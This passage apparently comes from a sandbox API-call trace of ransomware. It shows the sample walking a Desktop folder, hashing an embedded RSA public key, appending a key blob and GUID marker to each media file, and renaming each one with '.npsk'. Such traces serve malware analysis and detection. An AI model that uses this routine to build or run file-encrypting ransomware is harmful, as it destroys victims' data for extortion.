(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OKUWlfXXOAa.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\okuwlfxxoaa.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OKUWlfXXOAa.jpg.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\okuwlfxxoaa.jpg.npsk")) returned 1 [0214.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.897] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.897] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.898] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.898] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8036a870, ftCreationTime.dwHighDateTime=0x1d5db50, ftLastAccessTime.dwLowDateTime=0x3e640140, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0x3e640140, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x78ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pQ_BEWt9108efGO tJz_.flv", cAlternateFileName="PQ_BEW~1.FLV")) returned 1 [0214.898] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pQ_BEWt9108efGO tJz_.flv") returned=".flv" [0214.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pQ_BEWt9108efGO tJz_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pq_bewt9108efgo tjz_.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.899] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=30959) returned 1 [0214.899] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.901] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x78c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.901] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.903] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x78ef, lpOverlapped=0x0) returned 1 [0214.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.903] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.904] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.905] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.905] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.905] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.905] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.905] GetLastError () returned 0x0 [0214.905] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.905] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.905] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.905] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.905] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.905] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.905] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.905] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.906] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x78ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.906] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.906] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.906] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.906] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.906] CloseHandle (hObject=0x61c) returned 1 [0214.908] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pQ_BEWt9108efGO tJz_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pq_bewt9108efgo tjz_.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pQ_BEWt9108efGO tJz_.flv.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pq_bewt9108efgo tjz_.flv.npsk")) returned 1 [0214.909] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.909] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.909] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.910] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.910] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9328e5e0, ftCreationTime.dwHighDateTime=0x1d5d7d3, ftLastAccessTime.dwLowDateTime=0xc6efde40, ftLastAccessTime.dwHighDateTime=0x1d5e554, ftLastWriteTime.dwLowDateTime=0xc6efde40, ftLastWriteTime.dwHighDateTime=0x1d5e554, nFileSizeHigh=0x0, nFileSizeLow=0xf8d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pSbgO3wofHbNFLgP8QZ.png", cAlternateFileName="PSBGO3~1.PNG")) returned 1 [0214.910] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pSbgO3wofHbNFLgP8QZ.png") returned=".png" [0214.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pSbgO3wofHbNFLgP8QZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\psbgo3wofhbnflgp8qz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.911] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=63696) returned 1 [0214.911] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.913] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf8aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.913] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.914] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xf8d0, lpOverlapped=0x0) returned 1 [0214.914] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.914] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.914] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.914] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0214.915] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.915] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.915] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.915] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.915] GetLastError () returned 0x0 [0214.915] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.915] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0214.915] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.915] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.916] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.916] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.916] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.916] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.917] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xf8d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.917] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.917] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.917] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.917] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.917] CloseHandle (hObject=0x61c) returned 1 [0214.919] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pSbgO3wofHbNFLgP8QZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\psbgo3wofhbnflgp8qz.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pSbgO3wofHbNFLgP8QZ.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\psbgo3wofhbnflgp8qz.png.npsk")) returned 1 [0214.919] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.919] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.919] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.921] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0214.921] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41872e20, ftCreationTime.dwHighDateTime=0x1d5e2d4, ftLastAccessTime.dwLowDateTime=0xbbddcc60, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xbbddcc60, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x14c0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pu N.wav", cAlternateFileName="PUN~1.WAV")) returned 1 [0214.921] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pu N.wav") returned=".wav" [0214.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pu N.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pu n.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.921] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=85003) returned 1 [0214.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.923] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x14be5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.923] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0214.940] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x14c0b, lpOverlapped=0x0) returned 1 [0214.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0214.942] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0214.943] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0214.943] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0214.943] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0214.943] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0214.943] GetLastError () returned 0x0 [0214.943] CryptDestroyHash (hHash=0x3277d68) returned 1 [0214.943] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0214.943] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0214.943] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0214.943] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0214.943] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0214.943] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.943] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0214.944] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x14c0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0214.944] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0214.944] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0214.944] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0214.944] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0214.945] CloseHandle (hObject=0x61c) returned 1 [0214.947] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pu N.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pu n.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pu N.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pu n.wav.npsk")) returned 1 [0214.947] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0214.947] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0214.947] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0214.949] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0214.949] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc473a700, ftCreationTime.dwHighDateTime=0x1d5e73e, ftLastAccessTime.dwLowDateTime=0x21a54290, ftLastAccessTime.dwHighDateTime=0x1d5de56, ftLastWriteTime.dwLowDateTime=0x21a54290, ftLastWriteTime.dwHighDateTime=0x1d5de56, nFileSizeHigh=0x0, nFileSizeLow=0x7509, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qmx9sV04.gif", cAlternateFileName="")) returned 1 [0214.949] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qmx9sV04.gif") returned=".gif" [0214.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qmx9sV04.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qmx9sv04.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0214.949] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=29961) returned 1 [0214.949] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0214.951] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x74e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 